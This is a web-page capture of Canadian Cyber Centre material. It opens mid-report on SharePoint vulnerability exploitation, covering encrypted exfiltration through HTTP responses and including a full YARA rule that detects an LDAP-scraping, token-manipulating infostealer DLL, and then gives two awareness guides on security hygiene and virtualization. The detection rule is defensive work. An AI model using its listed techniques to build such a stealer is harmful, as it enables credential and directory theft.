exfiltration phase related to executing payloads embedded in web server requests. The most commonly observed technique was encrypting the result using a symmetric key (<a href="https://attack.mitre.org/techniques/T1048/001/">T1048.001</a>), encoding that result using Base64, and then returning the Base64-encoded buffer as part of the HTTP response from the web server. This encryption is encapsulated inside the regular Transport Layer Security (TLS) connections observed on normal port 443 traffic for the application.</p> </div> </div> </section><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!– Indicators of compromise and recommendations –> <section><h2 class="text-info" id="indicators">Indicators of compromise and recommendations</h2> <p>IoCs were distributed via the Cyber Centre’s automated threat intelligence sharing platform (AVENTAIL) and through alerts and communications by the Canadian Cyber Security Incident Response Team (CSIRT). This ensured that partners across all sectors had the information they needed to act decisively.</p> <p>For up-to-date information on alerts, advisories and guidance relating to the SharePoint vulnerabilities, please refer to the Cyber Centre alert <a href="https://www.cyber.gc.ca/en/alerts-advisories/al25-009-vulnerability-impacting-microsoft-sharepoint-server-cve-2025-53770">Vulnerability Impacting Microsoft SharePoint Server (CVE-2025-53770)</a>.</p> </section><!– Cyber Centre tools and services –><section><h2 class="text-info" id="tools-services">Cyber Centre tools and services</h2> <p>No single tool, service or turnkey solution can reconstruct an incident, trace an attacker’s path or validate a threat on its own. A holistic approach using multiple perspectives is required to conduct a thorough investigation. As such, the Cyber Centre relies on multiple layered telemetry sources to detect threats and protect monitored assets.</p> <p>Active scanning tools helped identify Internet-exposed high-priority servers. <a href="https://www.cyber.gc.ca/en/tools-services/assemblyline">AssemblyLine</a> was used to enable triage at scale, processing hundreds of thousands of files per day. The Cyber Centre made enhancements to its <a href="https://github.com/cybercentrecanada/assemblyline-service-dotnet-decompiler">DotnetDecompiler Service</a> to automate the decompilation of .NET executables. This is now available in the Cyber Centre’s open-source repository, allowing the broader cyber security community the benefit of the same advanced capabilities.</p> <p>In response to this incident, the Cyber Centre also created YARA rules to help with the detection of malicious files related to the threat actor’s activity. Additional YARA rules will be released periodically after an evaluation period to ensure accuracy.</p> <p>The sample YARA rule below implements a detection for the LDAP scraping activity found in payloads extracted from the compromised server.</p> <!– Figure 12 –> <section class="panel panel-default col-md-12"><div class="panel-body"> <h3 class="text-center" id="fig12"><strong>Figure 12: YARA rule for LDAP data collection detection</strong></h3> <figure><img alt="Figure 12 – Long description immediately follows" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/cyber-threat-detection-sharepoint-vulnerabilities-fig12-e.png" /></figure><details><summary>Long description – YARA rule for LDAP data collection detection</summary><p>The image shows a YARA rule named WIN_LDAPQuery designed to detect DLL files performing LDAP queries. It includes metadata such as the rule’s purpose, category, and reference to a SharePoint vulnerability advisory. The rule identifies suspicious behaviour by matching specific strings related to LDAP operations, encryption, and token handling, combined with conditions targeting file size and string occurrences.</p> <pre class="prettyprint"> <span class="wb-inv">Code</span> rule win_ldapquery { meta: id = "1vOyulv5H6pIcnCKCQJxyB" fingerprint = "69d05a0633335c9c8c739d33e2af3b9f4be01369d4ccefb83e55d2fe094b0a87" version = "1.0" modified = "2025-08-27" status = "RELEASED" sharing = "TLP:CLEAR" source = "CCCS" author = "reveng@CCCS" description = "Detect a DLL that is performing a LDAP query." category = "MALWARE" malware = "ldapquery" malware_type = "INFOSTEALER" malware_type = "HACKTOOL" report = "TA25-0056" report = "TA25-0057" reference = "https://www.cyber.gc.ca/en/alerts-advisories/al25-009-vulnerability-impacting-microsoft-sharepoint-server-cve-2025-53770" strings: // Detection of classes and function names (latest version). $a1 = "LDir" ascii $a2 = "Explore" ascii $a3 = "Internals" ascii $a4 = "EncryptAes" ascii $a5 = "DecryptAes" ascii $a6 = "Set Token Error" wide $a7 = "AdsDateValue" ascii $a8 = "FindHandle" ascii // Detection of function names (oldest version). $x1 = "JavaScriptSerializer" ascii $x2 = "Serialize" ascii $x3 = "EncryptAes" ascii $x4 = "DecryptAes" ascii $x5 = "DirectorySearcher" ascii // Product and assembly version. $b1 = "0.0.0.0" wide // Guid for Internet Explorer (IE) COM object and strings for writing the HTTP response. $c1 = "9068270B-0939-11D1-8BE1-00C04FD8D503" ascii $c2 = "HttpResponse" ascii $c3 = "HttpContext" ascii $c4 = "ToBase64String" ascii $c5 = "GZipStream" ascii $c6 = "CreateEncryptor" ascii // Dynamic libraries with extern functions for security token escalation. $d1 = "advapi32.dll" ascii $d2 = "ntdll.dll" ascii $d3 = "kernel32.dll" ascii $d4 = "NtQuerySystemInformation" ascii $d5 = "OpenProcessToken" ascii $d6 = "GetTokenInformation" ascii $d7 = "SetThreadToken" ascii $d8 = "GetCurrentThreadToken" ascii $d9 = "Administrator" wide $d10 = "IUSR" wide // LDAP related strings. $e1 = "LDAP://" wide $e2 = "samaccountname=" wide nocase $e3 = "cn=" wide nocase $e4 = "msexchrecipienttypedetails=" wide $e5 = "userprincipalname=" wide $e6 = "mail=" wide condition: uint16(0) == 0x5A4D and ( (5 of ($a*) and 4 of ($d*)) or all of ($x*) ) and $b1 and 4 of ($c*) and 2 of ($e*) and filesize &lt; 2MB } </pre> </details></div> </section></section><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!– Cyber Centre tools and services –> <section><h2 class="text-info" id="acknowledgements">Acknowledgments</h2> <p>As a part of the Communications Security Establishment Canada (CSE), the Cyber Centre is a proud member of the Five Eyes, the world’s longest-standing and closest intelligence-sharing alliance. Sharing IoCs and <abbr and="" procedures="" techniques="" title="tactics,">TTPs</abbr> with the cyber community and Five Eyes partners has been instrumental since the SharePoint vulnerabilities were first discovered, and ongoing analytical exchanges have maximized the value of collected data.</p> <p>Further collaboration with organizations such as the Microsoft Threat Intelligence Center (MSTIC) and Palo Alto’s Unit42 has enabled the exchange of detailed malware analysis and technical findings, strengthening collective defences.</p> </section><section class="alert alert-info"><p><strong>Disclaimer:</strong> The Cyber Centre disclaims all liability for any loss, damage, or costs arising from the use of or reliance on the information within this article. Readers are solely responsible for verifying the accuracy and applicability of any information before acting on it.</p> </section><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> </div> </div> </div> </div> </div> </article>

<article data-history-node-id="3435" about="/en/guidance/cyber-security-hygiene-best-practices-your-organization-itsap10102" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>September 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.10.102</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>September 2025 | Awareness series</strong></p> </div> </div> <p>Cyber security hygiene refers to the best practices your organization can take to maintain the overall health and security of your <abbr title="information technology">IT</abbr> environment. Your cyber security hygiene helps you better defend your networks, systems and data from threat actors.</p> <p>Threat actors, even in more sophisticated attacks, leverage common vulnerabilities and weaknesses to attack systems and gain initial access. By building a solid cyber security foundation, your organization is better positioned to protect, defend and recover from cyber incidents.</p> <h2 class="text-info">On this page</h2> <ul><li><a href="#checklist">Cyber security hygiene checklist</a> <ul><li><a href="#network">Network and endpoint protection</a></li> <li><a href="#system">System protection</a></li> <li><a href="#education">User education and additional protective measures</a></li> </ul></li> </ul><h2 class="text-info" id="checklist">Cyber security hygiene checklist</h2> <p>The following checklist provides actions your organization can take to strengthen your cyber security.</p> <p>While not all actions may be feasible, you should prioritize implementing those that are most impactful and sustainable for your organization. Doing so will enhance your cyber security posture.</p> <h3 id="network">Network and endpoint protection</h3> <ul><li>Protect your network and endpoints with the following tools <ul><li>anti-virus and anti-malware software</li> <li>network protocol inspection tools</li> <li>endpoint detection and response</li> <li>firewalls</li> <li>wireless intrusion detection and prevention systems</li> <li>mobile endpoint threat management solutions and mobile threat defence products</li> </ul></li> <li>Segment your networks to stop traffic from flowing to sensitive or restricted zones</li> <li>Implement a security information and event management system to enable real-time, continuous monitoring to identify anomalies in your <ul><li>network traffic</li> <li>wireless access points</li> <li>mobile device gateways</li> </ul></li> <li>Monitor your security critical components, including the <ul><li>Domain Name System (DNS) server</li> <li>authentication server</li> <li>public key infrastructure</li> </ul></li> <li>Implement protective <abbr title="Domain Name System">DNS</abbr> to prevent users from inadvertently visiting potentially malicious domains on the Internet</li> <li>Regularly renew cryptographic keys to maintain secure communications</li> <li>Document secure baseline configurations for all your <abbr title="information technology">IT</abbr>, operational technology components and cloud infrastructure</li> <li>Establish and maintain a configuration management database</li> <li>Conduct and maintain an inventory of your <abbr title="information technology">IT</abbr> assets</li> <li>Manage and detect unauthorized assets by developing and maintaining <abbr title="information technology">IT</abbr> asset management procedures that ensure proper tagging and labelling of hardware and software assets</li> </ul><h4>Read more</h4> <ul><li><a href="/en/guidance/preventative-security-tools-itsap00058">Preventative security tools (ITSAP.00.058)</a></li> <li><a href="/en/guidance/using-security-information-event-management-tools-manage-cyber-security-risks-itsm80024">Using security information and event management tools to manage cyber security risks (ITSM.80.024)</a></li> <li><a href="/en/guidance/network-security-logging-monitoring-itsap80085">Network security logging and monitoring (ITSAP.80.085) </a></li> <li><a href="/en/guidance/domain-name-system-dns-tampering-itsap40021">Domain Name System (DNS) tampering (ITSAP.40.021)</a></li> <li><a href="/en/guidance/protective-domain-name-system-itsap40019">Protective Domain Name System (ITSAP.40.019)</a></li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <h3 id="system">System protection</h3> <ul><li>Enable automatic updates and patches for your firmware, hardware, software and operating systems, especially for Internet-exposed services and systems</li> <li>Patch operating systems and applications promptly after assessing organizational risk and confirming compatibility with your environment</li> <li>Enforce phishing-resistant multi-factor authentication (MFA) for all accounts and systems, especially those with administrative privileges</li> <li>Encourage the use of strong, unique, and confidential passphrases or passwords where <abbr title="multi-factor authentication">MFA</abbr> is not technically feasible</li> <li>Ensure administrators use dedicated workstations that do not allow web browsing or email access</li> <li>Regularly review and update user privileges, such as <ul><li>remove users no longer in your organization</li> <li>edit user privileges if users no longer require access to certain data or systems</li> <li>limit administrative privileges to a small number of users</li> <li>require two-person integrity for administrative privileges</li> <li>conduct administrative functions from a dedicated administrative workstation</li> </ul></li> <li>Apply the principle of least privilege, ensuring users only have the set of privileges that are essential to performing authorized tasks</li> <li>Consider role-based access control</li> <li>Manage mobile devices with unified endpoint management software</li> <li>Implement application allow lists to control what applications and components are allowed on your networks and systems</li> <li>Assess third-party applications to identify and disable unnecessary components or functions or require human intervention before activation (for example, macros)</li> <li>Disable autorun or autoplay on all your operating systems and web browsers to avoid automatic installations of unauthorized software</li> <li>Establish an incident response plan and conduct annual tests to ensure timely restoration of critical functions and effective recovery</li> <li>Categorize your assets to identify those that are most critical to your organization’s operations</li> <li>Regularly backup critical data and systems to offline storage, ensuring backups are isolated from network connections</li> <li>Test your backups periodically to ensure data and systems can be recovered quickly and successfully</li> <li>Proactively manage device lifecycles to address vulnerabilities in end-of-life or end-of-service-life devices, which often remain unpatched and increase security risks</li> </ul><h4>Read more </h4> <ul><li><a href="/en/guidance/top-10-it-security-action-items-no2-patch-operating-systems-and-applications-itsm10096">Top 10 <abbr title="information technology">IT</abbr> security action items: No. 2 patch operating systems and applications (ITSM.10.096) </a></li> <li><a href="/en/guidance/secure-your-accounts-and-devices-multi-factor-authentication-itsap30030">Secure your accounts and devices with multi-factor authentication (ITSAP.30.030) </a></li> <li><a href="/en/guidance/top-10-it-security-actions-no3-managing-controlling-administrative-privileges-itsm10094">Top 10 <abbr title="information technology">IT</abbr> security actions: No. 3 managing and controlling administrative privileges (ITSM.10.094)</a></li> <li><a href="/en/guidance/security-considerations-mobile-device-deployments-itsap70002">Security considerations for mobile device deployments (ITSAP.70.002) </a></li> <li><a href="/en/guidance/application-allow-list-itsap10095">Application allow list (ITSAP.10.095) </a></li> <li><a href="/en/guidance/developing-your-incident-response-plan-itsap40003">Developing your incident response plan (ITSAP.40.003) </a></li> <li><a href="/en/guidance/tips-backing-your-information-itsap40002">Tips for backing up your information (ITSAP.40.002) </a></li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <h3 id="education">User education and additional protective measures</h3> <ul><li>Provide ongoing, tailored cyber security training to ensure your employees know how to respond to suspicious links or emails</li> <li>Provide privacy awareness training to your employees to reduce the risk of privacy breaches</li> <li>Identify and subscribe to relevant security information sources or alert services to stay informed about threats that could impact your organization</li> <li>Develop an internal and external contact list of key stakeholders to alert during cyber threat events</li> </ul><h4>Read more</h4> <ul><li><a href="/en/guidance/offer-tailored-cyber-security-training-your-employees-itsap10093">Offer tailored cyber security training to your employees (ITSAP.10.093)</a></li> <li><a href="/en/guidance/top-measures-enhance-cyber-security-small-and-medium-organizations-itsap10035">Top measures to enhance cyber security for small and medium organizations (ITSAP.10.035) </a></li> <li><a href="/en/guidance/top-10-it-security-actions-protect-internet-connected-networks-and-information-itsm10089">Top 10 <abbr title="information technology">IT</abbr> security actions to protect Internet-connected networks and information (ITSM.10.089) </a></li> <li><a href="/en/cyber-security-readiness/cyber-security-readiness-goals-securing-our-most-critical-systems">Cyber Security Readiness Goals: Securing Our Most Critical Systems</a></li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> </div> </div> </div> </div> </div> </article>

<article data-history-node-id="682" about="/en/guidance/virtualizing-your-infrastructure-itsap70011" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>September 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.70.011</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>August 2025 | Awareness series</strong></p> </div> <!–pdf download–> <div class="col-md-12"><!–<div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/cyber/publications/itsap70011.pdf">Virtualizing your infrastructure (ITSAP.70.011) (PDF,&nbsp;807&nbsp;KB)</a></p> </div>–> <p>Virtualization is a method of hardware abstraction that allows the creation of software versions of <abbr title="information technology">IT</abbr> systems and services which are traditionally implemented on separate physical hardware. These software versions, or virtual instances, can dramatically increase efficiency and decrease costs. Virtualization uses hardware to its full capacity by distributing its capabilities among many different services.</p> <p>Before implementing virtualization within your organization, you should understand the associated risks and ensure you protect your network, systems and information. This guidance covers the basics virtualization, how your organization can benefit from it and the potential risks involved.</p> <h2 class="text-info">On this page</h2> <ul><li><a href="#virtualization">How virtualization works</a></li> <li><a href="#what-can-virtualization">What virtualization can do for your organization</a></li> <li><a href="#types-of-virtualization">Types of virtualization</a></li> <li><a href="#benefits-of-virtualization">Benefits of virtualization</a></li> <li><a href="#risks-virtualization">Risks of virtualization</a></li> <li><a href="#hypervisor-vendor">What to consider when selecting a hypervisor vendor</a></li> <li><a href="#mitigate-risks-virtualization">How to mitigate the risks of implementing virtual technology</a></li> <li><a href="#learn-more">Learn more</a></li> </ul><h2 class="text-primary text-info" id="virtualization">How virtualization works</h2> <p>To run your systems and services virtually there are 3 main components.</p> <h3>Virtual machine</h3> <p>With virtualization, you can run your applications on fewer physical servers. Applications and software run virtually on a simulated computer system called a virtual machine (VM). The <abbr title="virtual machine">VM</abbr> has all the features of a computer server, without needing the physical hardware attached. A hypervisor supports the <abbr title="virtual machine">VM</abbr>.</p> <h3>Hypervisor</h3> <p>The hypervisor provides the layer of abstraction between the underlying hardware and hosted virtual machines. An abstraction layer can hide or show as much detail about your system as you want. The hypervisor allocates resources, such as centralized processing unit access, storage and memory, to multiple <abbr title="virtual machine">VM</abbr>s. This allows them to run concurrently on the same underlying hardware as though they each had their own dedicated hardware.</p> <p>The use of hypervisor technology may allow for quicker builds and snapshots of <abbr title="virtual machine">VM</abbr> images. The administration of the hypervisor should be done using a dedicated administrator workstation (DAW). <abbr title="dedicated administrator workstation">DAW</abbr>s are limited-use workstations that can only be used by those who have privileged access to perform administrative tasks. They are meant to increase the security of your network.</p> <p>There are 2 types of hypervisors:</p> <ul><li>bare-metal hypervisor (also known as Type 1), which runs directly on physical hardware</li> <li>hosted (also known as Type 2), which runs as an application on a host operating system</li> </ul><p>Hypervisor technologies may also provide additional functionality or features such as the use of <abbr title="virtual machine">VM</abbr> snapshots and backups, virtual networking capabilities between <abbr title="virtual machine">VM</abbr>s, <abbr title="virtual machine">VM</abbr> monitoring and more. Note, that the use of a hypervisor may incur additional overhead.</p> <h3>Hardware servers</h3> <p>A single hardware server may support multiple <abbr title="virtual machine">VM</abbr>s. Without virtualization, idle applications have resources that are unused, for example:</p> <ul><li>processing power</li> <li>RAM</li> <li>storage</li> </ul><p>With virtualization, hardware servers can be used at full capacity to offer the hypervisor all the resources necessary to support the <abbr title="virtual machine">VM</abbr>s.</p> <div class="panel panel-default mrgn-tp-lg"> <div class="panel-body"> <figure><figcaption class="mrgn-bttm-md"><strong>Figure 1: Hardware server supporting a virtual machine</strong></figcaption><img alt="Hardware server supporting a virtual machine" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/itsap-70011-virtualizing-your-infrastructure-v2-e.png" /><details class="brdr-tp brdr-rght brdr-bttm brdr-lft mrgn-bttm-sm"><summary>Long description – Figure 1: Hardware server supporting a virtual machine </summary><p>The figure 1, shows how the hardware server supports the hypervisor and the virtual machine. The image shows 3 components, from left to right, the hardware server connects to the hypervisor and then to the virtual machine(s).</p> </details></figure></div> </div> <h2 class="text-primary text-info" id="what-can-virtualization">What virtualization can do for your organization</h2> <p>Using virtualization, your organization can advance the performance of its infrastructure in the following ways:</p> <ul><li>run multiple operating systems on one physical machine</li> <li>divide system resources between <abbr title="virtual machine">VM</abbr>s, also known as load balancing</li> <li>gain advanced resource controls</li> <li>create virtualized security appliances, such as a firewall</li> <li>easily move, copy and save <abbr title="virtual machine">VM</abbr>s to other files and systems</li> <li>run virtual desktop infrastructure in-office and remotely</li> </ul><h2 class="text-primary text-info" id="types-of-virtualization">Types of virtualization</h2> <p>Virtualization can be used to perform several different functions for different needs. Your organization may choose to use all or some of the following types of virtualization.</p> <h3>Server</h3> <p>A physical server is divided up into multiple virtual servers. Each virtual server can run its own operating system. This is effective for deploying <abbr title="information technology">IT</abbr> services within an organization.</p> <h3>Desktop</h3> <p>A workstation is virtualized so that users can access it from anywhere. This includes accessing your organization’s network from a smart device and working remotely. To learn more about workstation virtualization, read our guidance on <a href="https://www.cyber.gc.ca/en/guidance/using-virtual-desktop-home-and-office-itsap70111">using virtual desktop at-home and in-office (ITSAP.70.111)</a>.</p> <h3>Storage</h3> <p>All your physical data storage units are combined to create a large, virtualized unit. This streamlines storage capabilities and creates a central storage console.</p> <h3>Network</h3> <p>A hardware-based network is transformed into a software-based network. This consolidates all the network resources and simplifies administrative control.</p> <h3>Application</h3> <p>Computer programs can run on various operating systems (OS). An application is installed on an underlying <abbr title="Operating System">OS</abbr>, but through virtualization can be accessed and executed on others, such as running a Microsoft application on a Linux <abbr title="Operating System">OS</abbr>. This requires a virtualization layer to be inserted between the <abbr title="Operating System">OS</abbr> and the app.</p> <h3>Cloud computing</h3> <p>While virtualization is closely related to cloud computing, they are not the same concept. However, cloud computing utilizes virtualization to support many of its functions. To learn more about cloud computing, read our guidance <a href="https://www.cyber.gc.ca/en/guidance/thinking-moving-cloud-heres-how-do-it-securely">Thinking of moving to the cloud? Here’s how to do it securely</a>.</p> <h2 class="text-primary text-info" id="benefits-of-virtualization">Benefits of virtualization</h2> <p>Virtualization and the use of <abbr title="virtual machine">VM</abbr>s have several benefits. These examples are not inherent capabilities of virtualization but may be achieved depending on how you use it:</p> <ul><li>lowers costs for high performance <abbr title="information technology">IT</abbr> services</li> <li>increases <abbr title="information technology">IT</abbr> productivity, efficiency and responsiveness</li> <li>accelerates the installation of applications and implementations of resources</li> <li>minimizes network downtime</li> <li>decreases disaster recovery time</li> <li>simplifies data centre management</li> <li>segregates applications and data to enhance security and reliability</li> <li>creates environments to safely test applications</li> </ul><h2 class="text-primary text-info" id="risks-virtualization">Risks of virtualization</h2> <p>Your organization can introduce security vulnerabilities if you do not properly configure or secure virtualization technology. Risks may include the following:</p> <ul><li>vulnerabilities can be introduced by obsolete and unpatched servers (known as <abbr title="virtual machine">VM</abbr> sprawl)</li> <li>sensitive data can be compromised by moving <abbr title="virtual machine">VM</abbr>s</li> <li>entry points, like external access to the device, can be exploited when a <abbr title="virtual machine">VM</abbr> is offline and dormant</li> <li>hardware can be compromised by malware that spreads from <abbr title="virtual machine">VM</abbr>s or hypervisors, such as <abbr title="virtual machine">VM</abbr> escape</li> <li>unauthorized access may be permitted due to virtual separation not offering the required isolation for security baselines, such as privileged access</li> <li>control and visibility can be lost within the virtual environments or networks if traditional security devices are used</li> <li>resources can be exhausted if a hypervisor is compromised or if unauthorized changes are made to configurations</li> <li>protection for each <abbr title="virtual machine">VM</abbr> is more time consuming as each <abbr title="virtual machine">VM</abbr> as <ul><li>each <abbr title="virtual machine">VM</abbr> requires unique considerations and configurations</li> <li>each <abbr title="virtual machine">VM</abbr> runs individually from the core structure</li> </ul></li> <li>denial of service attack that affects one <abbr title="virtual machine">VM</abbr> can affect all connected <abbr title="virtual machine">VM</abbr>s unless quickly isolated</li> </ul><h2 class="text-primary text-info" id="hypervisor-vendor">What to consider when selecting a hypervisor vendor</h2> <p>You should choose a hypervisor vendor that can support your organization’s security requirements. Before selecting a vendor, consider the following factors to help support your decision:</p> <ul><li>whether the data is encrypted when it is in transit and at rest</li> <li>the security controls that the vendor has in place to protect sensitive data</li> <li>whether the vendor uses bare-metal or hosted hypervisors</li> <li>whether the vendor has monitoring and auditing capabilities</li> <li>who has access to the data on the server</li> <li>how administrative privileges are controlled</li> <li>whether the vendor gives advice and guidance on configuring, deploying, and hardening the virtualized environment</li> </ul><h2 class="text-primary text-info" id="mitigate-risks-virtualization">How to mitigate the risks of implementing virtual technology</h2> <p>Your organization can mitigate some of the risks associated with implementing virtual technology by taking the following 15 actions:</p> <ul><li>Select a trustworthy and reliable vendor</li> <li>Update and patch servers frequently</li> <li>Have your <abbr title="information technology">IT</abbr> team separate the different areas of your virtualized environment (e.g. public, storage, management) into network zones for better control</li> <li>Store highly sensitive data on separate physical servers</li> <li>Test high-risk applications in isolated environments</li> <li>Apply the principle of least privilege to ensure users only have enough privilege to carry out their job functions</li> <li>Use separation of duties to break down processes or tasks into a series of steps to reduce the likelihood of mistakes or malicious activity</li> <li>Implement multi-factor authentication for all accounts</li> <li>Train employees on cyber security best practices and provide role-based training</li> <li>Back up your data regularly</li> <li>Use a security information and even management approach to business operations to streamline the security of assets</li> <li>Install antivirus and intrusion detection or prevention systems on your infrastructure to keep all <abbr title="virtual machine">VM</abbr>s secure</li> <li>Manage your assets take stock of all infrastructure being used and regularly audit and remove unused <abbr title="virtual machine">VM</abbr>s</li> <li>Encrypt network traffic and hard drives anywhere sensitive data is stored to protect data in transit and at rest</li> <li>Develop and test an incident response plan</li> </ul><p>We strongly recommend using bare-metal hypervisors where possible for your organization’s virtualized environments. Bare-metal hypervisors have fewer layers and typically allow for more efficient use of hardware and additional functionality and capabilities compared to hosted hypervisors.</p> <h2 class="text-primary text-info" id="learn-more">Learn more</h2> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/cyber-centre-data-centre-virtualization-report-best-practices-data-centre-virtualization">Cyber Centre data centre virtualization report: Best practices for data centre virtualization (ITSP.70.010)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-security-considerations-consumers-managed-services-itsm50030">Cyber security considerations for consumers of managed services (ITSM.50.030)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/isolating-web-facing-applications-itsap10099">Isolating web-facing applications (ITSAP.10.099)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/top-10-it-security-action-items-no2-patch-operating-systems-and-applications-itsm10096">Top 10 IT security actions items: No.2 patch operating systems and applications (ITSM.10.096)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/protect-information-enterprise-level-itsap10097">Protect information at the enterprise level (ITSAP.10.097)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/using-encryption-keep-your-sensitive-data-secure-itsap40016">Using encryption to keep your sensitive data secure (ITSAP.40.016)</a></li> </ul></div> </div> </div> </div> </div> </div> </div> </article>